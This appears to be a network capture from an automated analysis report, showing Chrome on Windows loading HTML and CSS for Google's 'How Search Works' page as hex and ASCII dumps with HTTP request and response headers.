                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 65 6e 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 65 6e 2d 41 55 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ate" hreflang="en" href="https://www.google.com/intl/en/search/howsearchworks/"><link rel="alternate" hreflang="en-AU" href="https://www.google.com/intl/en-AU/search/howsearchworks/"><link rel="alternate" hreflang="en-GB" href="https://www.google.com/in
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 69 77 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6a 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 6a 61 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6b 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63
                                                                                                                                                                                                                                                                                          Data Ascii: nk rel="alternate" hreflang="iw" href="https://www.google.com/intl/iw/search/howsearchworks/"><link rel="alternate" hreflang="ja" href="https://www.google.com/intl/ja/search/howsearchworks/"><link rel="alternate" hreflang="ko" href="https://www.google.c
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 74 68 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 74 72 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 75 6b 2f 73
                                                                                                                                                                                                                                                                                          Data Ascii: rnate" hreflang="th" href="https://www.google.com/intl/th/search/howsearchworks/"><link rel="alternate" hreflang="tr" href="https://www.google.com/intl/tr/search/howsearchworks/"><link rel="alternate" hreflang="uk" href="https://www.google.com/intl/uk/s
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 65 53 62 54 6c 6c 57 5f 5f 63 77 74 4e 43 79 70 56 6f 79 74 4b 69 58 31 6f 70 48 30 4e 6b 34 73 33 4d 6a 6f 42 33 62 61 41 39 64 2d 36 6b 77 64 71 32 3d 65 33 36 35 2d 72 77 2d 70 61 2d 6e 75 2d 77 34 39 39 20 31 78 2c 20 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 7a 56 58 5f 64 41 46 5a 4f 72 73 64 41 61 78 32 61 59 49 74 4e 49 4c 67 42 56 34 53 55 39 33 45 53 35 69 68 31 32 45 4f 52 52 51 34 54 71 69 52 61 37 65 53 62 54 6c 6c 57 5f 5f 63 77 74 4e 43 79 70 56 6f 79 74 4b 69 58 31 6f 70 48 30 4e 6b 34 73 33 4d 6a 6f 42 33 62 61 41 39 64 2d 36 6b 77 64 71 32 3d 65 33 36 35 2d 72 77 2d 70 61 2d 6e 75 2d 77 39 39 38 20 32 78 22 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 39 39 70
                                                                                                                                                                                                                                                                                          Data Ascii: eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=e365-rw-pa-nu-w499 1x, https://lh3.googleusercontent.com/zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=e365-rw-pa-nu-w998 2x" media="(max-width: 499p
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC643INData Raw: 2d 6e 75 2d 77 33 30 30 30 20 32 78 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 20 6e 6f 6e 63 65 3d 22 75 47 7a 7a 48 42 41 4d 48 58 33 51 44 52 50 66 6f 49 72 49 7a 51 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 69 6d 61 67 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 7a 56 58 5f 64 41 46 5a 4f 72 73 64 41 61 78 32 61 59 49 74 4e 49 4c 67 42 56 34 53 55 39 33 45 53 35 69 68 31 32 45 4f 52 52 51 34 54 71 69 52 61 37 65 53 62 54 6c 6c 57 5f 5f 63 77 74 4e 43 79 70 56 6f 79 74 4b 69 58 31 6f 70 48 30 4e 6b 34 73 33 4d 6a 6f 42 33 62 61 41 39 64 2d 36 6b 77 64 71 32 3d 73 30 2d 72 77 2d 65 33 36
                                                                                                                                                                                                                                                                                          Data Ascii: -nu-w3000 2x" media="(min-width: 1440px)" nonce="uGzzHBAMHX3QDRPfoIrIzQ"><link rel="preload" as="image" href="https://lh3.googleusercontent.com/zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e36
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 69 6d 61 67 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 7a 56 58 5f 64 41 46 5a 4f 72 73 64 41 61 78 32 61 59 49 74 4e 49 4c 67 42 56 34 53 55 39 33 45 53 35 69 68 31 32 45 4f 52 52 51 34 54 71 69 52 61 37 65 53 62 54 6c 6c 57 5f 5f 63 77 74 4e 43 79 70 56 6f 79 74 4b 69 58 31 6f 70 48 30 4e 6b 34 73 33 4d 6a 6f 42 33 62 61 41 39 64 2d 36 6b 77 64 71 32 3d 73 30 2d 72 77 2d 65 33 36 35 22 20 69 6d 61 67 65 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 7a 56 58 5f 64 41 46 5a 4f 72 73 64 41 61 78 32 61 59 49 74 4e
                                                                                                                                                                                                                                                                                          Data Ascii: "><link rel="preload" as="image" href="https://lh3.googleusercontent.com/zVX_dAFZOrsdAax2aYItNILgBV4SU93ES5ih12EORRQ4TqiRa7eSbTllW__cwtNCypVoytKiX1opH0Nk4s3MjoB3baA9d-6kwdq2=s0-rw-e365" imagesrcset="https://lh3.googleusercontent.com/zVX_dAFZOrsdAax2aYItN
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 76 4e 68 48 75 67 4a 41 6e 73 41 53 32 44 4a 57 31 56 33 6b 51 2d 30 6c 73 43 54 6c 32 65 44 57 56 39 4e 57 32 70 34 4b 58 53 74 73 79 6e 70 37 45 6a 71 47 53 69 41 43 48 39 78 53 64 43 49 76 50 76 77 30 7a 39 6c 5f 4c 37 6b 4f 74 66 56 5a 48 30 37 69 51 75 61 73 47 49 47 57 79 46 71 68 70 64 59 3d 65 33 36 35 2d 72 77 2d 70 61 2d 6e 75 2d 77 34 39 39 20 31 78 2c 20 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 76 4e 68 48 75 67 4a 41 6e 73 41 53 32 44 4a 57 31 56 33 6b 51 2d 30 6c 73 43 54 6c 32 65 44 57 56 39 4e 57 32 70 34 4b 58 53 74 73 79 6e 70 37 45 6a 71 47 53 69 41 43 48 39 78 53 64 43 49 76 50 76 77 30 7a 39 6c 5f 4c 37 6b 4f 74 66 56
                                                                                                                                                                                                                                                                                          Data Ascii: eusercontent.com/fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfVZH07iQuasGIGWyFqhpdY=e365-rw-pa-nu-w499 1x, https://lh3.googleusercontent.com/fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfV


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          137192.168.2.750100142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1364OUTGET /search/howsearchworks/assets/axwyNx0d.css HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 41265
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC537INData Raw: 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 62 74 39 63 70 5f 31 7b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 30 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 62 74 39 63 70 5f 31 7b 70 61 64 64 69 6e 67 3a 32 34 70 78 20 30 20 30 7d 7d 68 74 6d 6c 3a 68 61 73 28 5b 64 61 74 61 2d 73 75 62 6e 61 76 5d 29 20 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 62 74 39 63 70 5f 31 7b 70 61 64 64 69 6e 67 3a 38 30 70 78 20 30 20 30 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 68 74 6d 6c 3a 68 61 73 28 5b 64 61 74 61 2d 73 75 62 6e 61 76 5d 29 20 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 62 74 39 63 70 5f 31 7b 70 61 64 64 69 6e 67 3a 32 34 70 78 20 30 20 30 7d 7d 2e 5f 6f
                                                                                                                                                                                                                                                                                          Data Ascii: ._container_bt9cp_1{padding:30px 0 0}@media (max-width: 1023px){._container_bt9cp_1{padding:24px 0 0}}html:has([data-subnav]) ._container_bt9cp_1{padding:80px 0 0}@media (max-width: 1023px){html:has([data-subnav]) ._container_bt9cp_1{padding:24px 0 0}}._o
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 38 66 30 66 65 7d 2e 5f 6f 70 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 65 79 2d 35 30 5f 31 76 6d 79 73 5f 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 7d 2e 5f 6f 70 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 79 65 6c 6c 6f 77 2d 35 30 5f 31 76 6d 79 73 5f 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 65 66 37 65 30 7d 2e 5f 73 70 61 63 65 72 73 5f 31 76 6d 79 73 5f 31 31 3e 2e 5f 6f 70 74 2d 6d 6f 62 69 6c 65 5f 31 76 6d 79 73 5f 31 31 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 5f 73 70 61 63 65 72 73 5f 31 76 6d 79 73 5f 31 31 3e 2e 5f 6f 70 74 2d 6d 6f 62 69 6c 65 5f 31 76 6d 79 73 5f
                                                                                                                                                                                                                                                                                          Data Ascii: ound-color:#e8f0fe}._opt-background-grey-50_1vmys_5{background-color:#f8f9fa}._opt-background-yellow-50_1vmys_8{background-color:#fef7e0}._spacers_1vmys_11>._opt-mobile_1vmys_11{display:none}@media (max-width: 767px){._spacers_1vmys_11>._opt-mobile_1vmys_
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 32 34 70 78 7d 2e 5f 73 69 7a 65 5c 3a 34 5f 31 76 6d 79 73 5f 37 39 7b 2d 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 33 36 70 78 7d 2e 5f 73 69 7a 65 5c 3a 35 5f 31 76 6d 79 73 5f 38 32 7b 2d 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 36 30 70 78 7d 2e 5f 73 69 7a 65 5c 3a 36 5f 31 76 6d 79 73 5f 38 35 7b 2d 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 38 30 70 78 7d 2e 5f 73 69 7a 65 5c 3a 37 5f 31 76 6d 79 73 5f 38 38 7b 2d 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 31 32 30 70 78 7d 2e 5f 73 69 7a 65 5c 3a 38 5f 31 76 6d 79 73 5f 39 31 7b 2d 2d 68 73 77 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 20 31 38 30 70 78 7d 2e 5f 73 69 7a 65 5c 3a 39 5f 31 76 6d 79 73
                                                                                                                                                                                                                                                                                          Data Ascii: -hsw-spacer-size: 24px}._size\:4_1vmys_79{--hsw-spacer-size: 36px}._size\:5_1vmys_82{--hsw-spacer-size: 60px}._size\:6_1vmys_85{--hsw-spacer-size: 80px}._size\:7_1vmys_88{--hsw-spacer-size: 120px}._size\:8_1vmys_91{--hsw-spacer-size: 180px}._size\:9_1vmys
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 73 68 61 70 65 2d 6d 61 72 67 69 6e 3a 2e 37 35 72 65 6d 7d 2e 5f 63 6f 76 65 72 5f 69 71 68 6c 32 5f 31 33 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 76 61 72 28 2d 2d 69 6d 61 67 65 2d 6f 62 6a 65 63 74 2d 66 69 74 2c 20 63 6f 76 65 72 29 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 76 61 72 28 2d 2d 69 6d 61 67 65 2d 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 2c 20 63 65 6e 74 65 72 29 7d 7d 40 6c 61 79 65 72 20 63 6f 6d 70 6f 6e 65 6e 74 7b 2e 5f 69 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 5f 31 61 33 30 77 5f 32 7b 64 69 73 70 6c 61 79 3a 63 6f 6e 74 65 6e 74 73 7d 2e 5f 69 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 5f 31
                                                                                                                                                                                                                                                                                          Data Ascii: round-repeat:no-repeat;background-size:cover;shape-margin:.75rem}._cover_iqhl2_13{object-fit:var(--image-object-fit, cover);object-position:var(--image-object-position, center)}}@layer component{._imageContainer_1a30w_2{display:contents}._imageContainer_1
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 65 73 6b 74 6f 70 5f 31 61 33 30 77 5f 35 33 7b 64 69 73 70 6c 61 79 3a 63 6f 6e 74 65 6e 74 73 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 5f 6f 75 74 65 72 43 6f 6e 74 61 69 6e 65 72 5f 31 61 33 30 77 5f 36 31 7b 64 69 73 70 6c 61 79 3a 63 6f 6e 74 65 6e 74 73 7d 2e 5f 72 6f 75 6e 64 65 64 5f 31 61 33 30 77 5f 36 34 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 78 2d 77 69 64 74 68 3a 76 61 72 28 2d 2d 69 6d 61 67 65 2d 6d 61 78 2d 77 69 64 74 68 29 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 7d 40 6c 61 79 65 72 20 63 6f 6d 70 6f 6e 65 6e 74 7b 2e 5f 76 69 64 65 6f 43 6f 6e 74 61 69 6e 65 72 5f 31 69 6c 30 77 5f 32 7b 64 69 73 70 6c 61 79 3a 63 6f
                                                                                                                                                                                                                                                                                          Data Ascii: esktop_1a30w_53{display:contents!important}}._outerContainer_1a30w_61{display:contents}._rounded_1a30w_64{display:block;border-radius:12px;overflow:hidden;max-width:var(--image-max-width);margin:0 auto}}@layer component{._videoContainer_1il0w_2{display:co
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 2e 5f 6f 70 74 2d 64 65 73 6b 74 6f 70 5f 31 69 6c 30 77 5f 35 33 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 5f 76 69 64 65 6f 43 6f 6e 74 61 69 6e 65 72 5f 31 69 6c 30 77 5f 32 20 76 69 64 65 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 76 69 64 65 6f 43 6f 6e 74 61 69 6e 65 72 5f 31 69 6c 30 77 5f 32 20 76 69 64 65 6f 2e 5f 63 6f 76 65 72 5f 31 69 6c 30 77 5f 36 34 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 7d 40 6c 61 79 65 72 20 63 6f 6d 70 6f 6e 65 6e 74 7b 2e 5f 63 68 61 70 74 65 72 5f 31 32 6a 35 79 5f 32 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                                                                                                                                                                                                                                                          Data Ascii: ._opt-desktop_1il0w_53{display:block!important}}._videoContainer_1il0w_2 video{max-width:100%}._videoContainer_1il0w_2 video._cover_1il0w_64{object-fit:cover;object-position:center center}}@layer component{._chapter_12j5y_2{display:flex;flex-direction:col
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 70 74 65 72 2d 67 61 70 29 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 63 68 61 70 74 65 72 5f 31 32 6a 35 79 5f 32 2e 5f 61 64 6a 75 73 74 65 64 54 69 74 6c 65 47 61 70 5f 31 32 6a 35 79 5f 34 31 20 2e 5f 68 65 61 64 6c 69 6e 65 54 69 74 6c 65 5f 31 32 6a 35 79 5f 34 31 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 61 6c 63 28 32 34 70 78 20 2d 20 76 61 72 28 2d 2d 63 68 61 70 74 65 72 2d 67 61 70 29 29 7d 7d 2e 5f 62 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 5f 31 32 6a 35 79 5f 34 39 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78 7d 7d 40 6c 61 79 65 72 20 74 65 6d 70 6c 61 74 65 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 76 31 37 6d 73 5f 32 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f
                                                                                                                                                                                                                                                                                          Data Ascii: pter-gap))}@media (max-width: 1023px){._chapter_12j5y_2._adjustedTitleGap_12j5y_41 ._headlineTitle_12j5y_41{margin-bottom:calc(24px - var(--chapter-gap))}}._buttonContainer_12j5y_49{margin-top:16px}}@layer template{._container_v17ms_2{box-sizing:border-bo
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 78 2d 73 74 61 72 74 7d 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 76 31 37 6d 73 5f 32 2e 5f 63 68 61 70 74 65 72 31 51 75 6f 74 65 5f 76 31 37 6d 73 5f 35 35 20 2e 5f 63 68 61 70 74 65 72 31 5f 76 31 37 6d 73 5f 34 35 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 76 31 37 6d 73 5f 32 2e 5f 63 68 61 70 74 65 72 31 51 75 6f 74 65 5f 76 31 37 6d 73 5f 35 35 20 2e 5f 63 68 61 70 74 65 72 31 5f 76 31 37 6d 73 5f 34 35 7b 6f 72 64 65 72 3a 32 7d 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 76 31 37 6d 73 5f 32 2e 5f 63 68 61 70 74 65 72 31 51 75 6f 74 65 5f 76 31 37 6d 73 5f 35 35 20 2e 5f 63 68 61 70 74 65 72 32 5f 76 31 37 6d 73 5f 35 30 7b 6f
                                                                                                                                                                                                                                                                                          Data Ascii: x-start}._container_v17ms_2._chapter1Quote_v17ms_55 ._chapter1_v17ms_45{align-items:center}@media (max-width: 1023px){._container_v17ms_2._chapter1Quote_v17ms_55 ._chapter1_v17ms_45{order:2}._container_v17ms_2._chapter1Quote_v17ms_55 ._chapter2_v17ms_50{o
